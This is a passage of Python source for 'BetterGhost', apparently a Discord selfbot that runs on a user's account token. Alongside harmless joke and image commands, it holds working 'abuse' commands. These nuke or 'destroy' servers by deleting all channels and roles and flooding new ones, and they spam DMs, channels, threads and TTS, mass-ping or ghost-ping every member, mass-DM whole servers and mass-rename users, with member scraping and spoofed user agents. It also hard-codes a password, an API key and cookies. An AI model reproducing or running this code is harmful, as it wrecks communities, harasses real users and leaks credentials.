embed = discord.Embed(title="Theme with the name " + name + " was deleted", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme with the name {name} was deleted ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="theme", description="Change your current theme.", usage="theme [theme]", aliases=["settheme"])
async def theme__(ctx, *, theme):
if os.path.isfile(f'themes/{theme}.json'):
updateTheme(theme + ".json")
Config.changeTheme(theme)
if __embedmode__:
embed = discord.Embed(title="That theme has been set", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ That theme has been set ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="prefix", description="Set the command prefix.", usage="prefix [prefix]", aliases=["c"])
async def prefix(ctx, *, prefix):
Config.changePrefix(prefix)
if __embedmode__:
embed = discord.Embed(title=f"Prefix changed to `{prefix}`", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Prefix changed to {prefix} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="restart", description="Restart BetterGhost selfbot.", usage="restart", aliases=["reboot", "reload"])
async def restart(ctx):
print_info("Restarting ghost...")
await ctx.send("Restarting ghost...")
restart_bot()
@BetterGhost.command(name="firstmessage", description="Get the first message in the command channel.", usage="firstmessage")
async def firstmessage(ctx):
messages = await ctx.channel.history(limit=1, oldest_first=True).flatten()
for message in messages:
firstMessage = message
if __embedmode__:
embed = discord.Embed(title="First Message", description=f"{firstMessage.jump_url}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"First message: {firstMessage.jump_url}")
@BetterGhost.command(name="haste", description="Upload text to BetterGhost's Haste site.", usage="haste [text]")
async def haste(ctx, *, text):
url = "https://haste.ghost.cool/haste"
payload=f'password=h5MEn3ptby4XSdxJ&text={text}&username={ctx.author.name}'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '__cfduid=dffeb66149683e21f8e860ea28116dd7d1613823909'
}
response = requests.request("POST", url, headers=headers, data=payload)
await ctx.send(response.text)
@BetterGhost.command(name="shrug", description="Shrug your arms.", usage="shrug")
async def shrug(ctx):
await ctx.send(f"¯\_(ツ)_/¯")
@BetterGhost.command(name="tableflip", description="Flip the table.", usage="tableflip")
async def tableflip(ctx):
await ctx.send("(╯°□°)╯︵ ┻━┻")
@BetterGhost.command(name="unflip", description="Put the table back.", usage="unflip")
async def unflip(ctx):
await ctx.send("┬─┬ ノ( ゜-゜ノ)")
# @BetterGhost.command(name="hide", description="Hide a message behind another message.", usage="hide [msg1] [msg2]")
# async def hide(ctx, msg1, msg2):
# await ctx.send(msg1+hideText+msg2)
@BetterGhost.command(name="blank", description="Send a blank message", usage="blank")
async def blank(ctx):
await ctx.send("** **")
@BetterGhost.command(name="length", description="Get the length of a string.", usage="length [string]", aliases=["stringlength"])
async def length(ctx, *, string):
await ctx.send(f"Length of `{string}`: " + len(string))
@BetterGhost.command(name="lmgtfy", description="Let me Google that for you.", usage="lmgtfy [search]", aliases=["letmegooglethatforyou"])
async def lmgtfy(ctx, *, search):
await ctx.send(f"https://lmgtfy.app/?q={search.replace(' ', '+')}")
@BetterGhost.command(name="selfbotcheck", description="Checks for users using a selfbot.", usage="selfbotcheck")
async def selfbotcheck(ctx):
await ctx.send("Checking for users with a trash selfbot...\nPeople who react below are using a selfbot.")
await ctx.send("GIVEAWAY")
await ctx.send("🎉 **GIVEAWAY** 🎉")
@BetterGhost.command(name="nukeserver", description="Delete all roles and channels in the command server.", usage="nukeserver", aliases=["nukeguild"])
async def nukeserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="destroyserver", description="Completely destroy the command server.", usage="destroyserver", aliases=["destroyguild"])
async def destroyserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
name = ''.join(random.choice(string.ascii_letters) for i in range(100))
await ctx.guild.edit(name=name)
for _ in range(500):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="spamchannels", description="Spam create channels with a desired name. (Thanks Port <3)", usage="spamchannels [amount] (name)", aliases=["spamcreatechannels"])
async def spamchannels(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_text_channel(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="spamroles", description="Spam create roles with a desired name.", usage="spamroles [amount] (name)", aliases=["spamcreateroles"])
async def spamroles(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_role(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="deletechannels", description="Delete all of the command server's channels.", usage="deletechannels", aliases=["delchannels", "removechannels"])
async def deletechannels(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="deleteroles", description="Delete all of the command server's roles.", usage="deleteroles", aliases=["delroles", "removeroles"])
async def deleteroles(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="dmspam", description="Spam DM messages X amount of times.", usage="dmspam [amount] [delay] [@user] [message]", aliases=["spamdm"])
async def dmspam(ctx, amount: int, delay: int, user: discord.User, *, message):
if __riskmode__:
for _ in range(amount):
try:
await user.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="threadspam", description="Spam create threads with a starting message.", usage="threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]", aliases=["spamthreads", "spamcreatethreads"])
async def threadspam(ctx, delay: int, amount: int, addusers: bool, name: str = "BetterGhost best selfbot!", *, startmessage: str):
if __riskmode__:
users = []
try:
await ctx.message.delete()
except:
pass
def createThread(title, channel_id, start_message_id):
return requests.request("post", f"https://discord.com/api/channels/{channel_id}/messages/{start_message_id}/threads", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"name": title}))
def getUsers(guild, channel):
DiscumClient = discum.Client(token=__token__, user_agent=f"{get_random_user_agent()}")
@DiscumClient.gateway.command
def pingpingbrbr(resp):
guild_id = f'{guild.id}'
channel_id = f'{channel.id}'
if resp.event.ready_supplemental:
DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
if DiscumClient.gateway.finishedMemberFetching(guild_id):
DiscumClient.gateway.removeCommand(pingpingbrbr)
DiscumClient.gateway.close()
DiscumClient.gateway.run()
members = []
for memberID in DiscumClient.gateway.session.guild(f'{guild.id}').members:
members.append(f"<@!{memberID}>")
return members
async def addUsers(users, channel_id):
try:
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"content": ' '.join(users)}))
except:
pass
if addusers:
print_info("Fetching channel members...")
users = getUsers(ctx.guild, ctx.channel)
await asyncio.sleep(2)
print(users)
await asyncio.sleep(2)
index = 0
if not ctx.author.guild_permissions.administrator:
if amount > 5:
print_info("Limiting amount of threads to 5 to prevent rate limits.")
amount = 5
for _ in range(amount):
index += 1
try:
message = await ctx.send(startmessage + f" {index}")
createThredResponse = createThread(name, ctx.channel.id, message.id)
if addusers:
print_info("Adding users to the thread...")
await addUsers(users, createThredResponse.json()["id"])
print_info("Created a new thread.")
try:
await message.delete()
except:
pass
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="channelspam", description="Spam a message X amount of times in every channel.", usage="channelspam [amount] [delay] [message]", aliases=["sendall", "sendtoallchannels", "msgallchannels", "messageallchannels"])
async def channelspam(ctx, amount:int, *, message:str):
if __riskmode__:
for _ in range(amount):
for channel in ctx.guild.text_channels:
try:
await channel.send(message)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="spam", description="Spam X amount of times.", usage="spam [amount] [delay] [message]")
async def spam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
global spammingMessages
spammingMessages = True
async def spamMessages():
for _ in range(amount):
if spammingMessages == True:
await ctx.send(message)
await asyncio.sleep(delay)
else:
return
BetterGhost.loop.create_task(spamMessages())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="stopspam", description="Stop spamming messages.", usage="stopspam")
async def stopspam(ctx):
if __riskmode__:
global spammingMessages
spammingMessages = False
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="ttsspam", description="Spam TTS messages X amount of times.", usage="ttsspam [amount] [delay] [message]", aliases=["texttospeachspam"])
async def ttsspam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
for _ in range(amount):
await ctx.send(message, tts=True)
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massghostping", description="Ping a mass amount of people in the command server and delete the messages.", usage="massghostping (amount of messages) (send delay)", aliases=["massghostmention", "theotherfunny"])
async def massghostping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
# members = []
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
# for channel in ctx.guild.text_channels:
# print_info(f"Starting fetch in #{channel.name}.")
# members2 = get_members(str(ctx.guild.id), str(channel.id))
# for member in members2:
# members.append(member)
# print_info(f"Fetched a total of {len(members)} members.")
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message, delete_after=0)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massping", description="Ping a mass amount of people in the command server.", usage="massping (amount of messages) (send delay)", aliases=["massmention", "sigmainstaller", "hahafunny"])
async def massping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massdm", description="Send a DM message to everyone in the server.", usage="massdm [delay] [amount] [message]")
@commands.guild_only()
async def massdm(ctx, delay:int=0, amount:int=10, *, message:str):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for _ in range(amount):
for member in members:
try:
member = await BetterGhost.fetch_user(int(member))
await member.send(message)
except:
pass
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="rickroll", description="Send never gonna give you up lyrics one by one.", usage="rickroll")
async def rickroll(ctx):
global rickRollEnabled
rickRollEnabled = True
async def sendLyrics():
file1 = open('data/rickroll.txt', 'r')
Lines = file1.readlines()
for line in Lines:
if rickRollEnabled == True:
await ctx.send(line)
await asyncio.sleep(1)
else:
return
BetterGhost.loop.create_task(sendLyrics())
@BetterGhost.command(name="stoprickroll", description="Stop sending rick astley lyrics.", usage="stoprickroll")
async def stoprickroll(ctx):
global rickRollEnabled
rickRollEnabled = False
@BetterGhost.command(name="suggest", description="Suggest something.", usage="suggest [suggestion]")
async def suggest(ctx, *, suggestion):
if __embedmode__:
embed = discord.Embed(title="Suggestion", description=suggestion, colour=__embedcolour__)
embed.set_footer(text=ctx.author.name + " suggested.", icon_url=ctx.author.avatar_url)
embed.timestamp = datetime.now()
msg = await ctx.send(embed=embed)
else:
msg = await ctx.send(f"""```ini
[ Suggestion ]
{suggestion}
# {ctx.author.name} suggested.```""", delete_after=__deletetimeout__)
await msg.add_reaction('\U0001F44D')
await msg.add_reaction('\U0001F44E')
@BetterGhost.command(name="massnick", description="Change the nickname of all members in the command server.", usage="massnick [nickname]", aliases=["massnickname", "masschangenickname"])
async def massnick(ctx, *, nickname):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick=nickname)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massunnick", description="Reset the nickname of all members in the command server.", usage="massunnick", aliases=["massremovenickname", "massunnickname"])
async def massunnick(ctx):
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick="")
await asyncio.sleep(1)
except:
pass
@BetterGhost.command(name="dadjoke", description="A random dad joke.", usage="dadjoke")
async def dadjoke(ctx):
url = "https://icanhazdadjoke.com/"
payload={}
headers = {
'Accept': 'text/plain',
'Cookie': '__cfduid=d6dccebb48b09fdeb9a97022fa2f292811612029832'
}
response = requests.request("GET", url, headers=headers, data=payload)
if __embedmode__:
embed = discord.Embed(description=response.text, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response.text)
@BetterGhost.command(name="randomquestion", description="A random question.", usage="randomquestion", aliases=["ranquestion"])
async def randomquestion(ctx):
question = requests.get("https://nekos.life/api/v2/why").json()["why"]
if __embedmode__:
embed = discord.Embed(description=question, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question)
@BetterGhost.command(name="randommessage", description="A random message.", usage="randommessage", aliases=["ranmessage"])
async def randommessage(ctx):
url = "https://ajith-messages.p.rapidapi.com/getMsgs"
querystring = {"category":"Random"}
headers = {
'x-rapidapi-key': "01eddf9d3cmsh5207aa226152e38p1f5a60jsn182a112b106d",
'x-rapidapi-host': "ajith-messages.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
response_data = response.json()
if __embedmode__:
embed = discord.Embed(description=response_data["Message"], colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response_data["Message"])
@BetterGhost.command(name="meme", description="A random meme.", usage="meme", aliases=["randommeme"])
async def meme(ctx):
response = requests.get("https://meme-api.herokuapp.com/gimme")
data = response.json()
if __embedmode__:
embed = discord.Embed(title=data["title"], url=data["postLink"], colour=__embedcolour__)
embed.set_image(url=data["url"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_author(name=f"u/{data['author']}", url=f"https://reddit.com/u/{data['author']}")
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(data["title"] + "\n" + data["url"])
@BetterGhost.command(name="gif", description="Search for a gif.", usage="gif [search]", aliases=["searchgif"])
async def gif(ctx, *, search):
if CONFIG["api_keys"]["tenor"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires a tenor API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires a tenor API key.")
else:
search = search.replace(" ", "+")
response = requests.get(f'https://g.tenor.com/v1/search?q={search}&key={CONFIG["api_keys"]["tenor"]}&limit=10000')
data = response.json()
#print(data['results'][0]["media"][0]["gif"]["url"])
if __embedmode__:
embed = discord.Embed(title=f"{search.replace('+', ' ')}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
await ctx.send(embed=embed)
else:
await ctx.send(data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
@BetterGhost.command(name="cat", description="A random cat image.", usage="cat", aliases=["randomcat"])
async def cat(ctx):
request = requests.get("https://cataas.com/cat?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@BetterGhost.command(name="catgif", description="A random cat gif.", usage="catgif", aliases=["randomcatgif"])
async def catgif(ctx):
request = requests.get("https://cataas.com/cat/gif?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@BetterGhost.command(name="dog", description="A random dog image.", usage="dog", aliases=["randomdog"])
async def dog(ctx):
response = requests.get('https://dog.ceo/api/breeds/image/random')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="woof", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['message'])
await ctx.send(embed=embed)
else:
await ctx.send(data['message'])
@BetterGhost.command(name="shiba", description="A random shiba image.", usage="shiba", aliases=["randomshiba"])
async def shiba(ctx):
response = requests.get('https://shibe.online/api/shibes?count=1&httpsUrls=true')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="shiba", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data[0])
await ctx.send(embed=embed)
else:
